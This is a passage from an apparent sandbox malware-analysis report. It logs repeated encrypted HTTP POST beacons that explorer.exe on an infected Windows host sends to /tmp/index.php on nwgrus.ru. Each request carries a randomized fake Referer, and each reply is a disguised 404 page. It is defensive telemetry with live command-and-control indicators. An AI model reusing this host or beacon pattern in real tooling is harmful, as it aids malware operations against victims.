                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.465082148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:11.458384037 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://mmuqkomgbgwmrgx.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 139
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:11.458384037 CEST139OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 55 2c c2 8c
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuU,GgWXzYR>#we G+;ca+&S
                                      Oct 13, 2024 18:28:12.403850079 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:12 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.465092148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:12.412687063 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://lpffbcdshmrgy.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 183
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:12.412687063 CEST183OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 3a 2f e7 9f
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu:/%fYe_aC}S9%-U=@>#!=e$#[z&'& M8#
                                      Oct 13, 2024 18:28:13.359931946 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:13 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.465099148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:13.370277882 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://espuvwcpdtgkhr.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 200
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:13.370277882 CEST200OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 7a 33 e4 a2
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuz3&lmfD'!1,9~0Pp}b>=7ca*TnO&@t3N/\UB<gq*\1
                                      Oct 13, 2024 18:28:14.317760944 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:14 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.465105148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:14.879990101 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://qjhgyfigxhdukho.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 288
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:14.879990101 CEST288OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 7e 03 af e2
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu~Puz}hM74~9sl_s&\5Tl0ZUa!7+(c' EQ6ugRSE35p`QI$ \G+
                                      Oct 13, 2024 18:28:15.827591896 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:15 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.465115148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:15.840307951 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://qbdfqckmklgu.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 330
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:15.840347052 CEST330OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 58 5e e4 8d
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuX^l0RXihIX+dMeS0RXzTVs_;L02i`6yjBV.Y#}qBDJ'_vFYvy^n
                                      Oct 13, 2024 18:28:16.790606976 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:16 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.465122148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:16.804027081 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://rccfvowoiuloot.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 368
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:16.804059982 CEST368OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 56 42 bd 8d
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuVBXVv{yGj/yprBUY4VJ.:JUN!HJCJ4(m:ML(}mSC<AV7hggfGDoS^
                                      Oct 13, 2024 18:28:17.753078938 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:17 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.2.465128148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:17.812771082 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://oxmwgvysvdebn.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 188
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:17.812810898 CEST188OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 75 37 a0 aa
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[*k,vuu7D PI/SOFId=E#]Cg)[<~WRZF`:0+7S
                                      Oct 13, 2024 18:28:18.774601936 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:18 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.2.465134148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:18.784312963 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://liapcosrblojgddt.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 189
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:18.784347057 CEST189OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 44 48 d6 aa
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[+k,vuDHRN!s~:u}rz0Z!G6%X[JK~3n@r5^0m'B
                                      Oct 13, 2024 18:28:19.727567911 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:19 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      35192.168.2.465140148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:19.740135908 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://kargncdaxawnud.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 232
                                      Host: nwgrus.ru
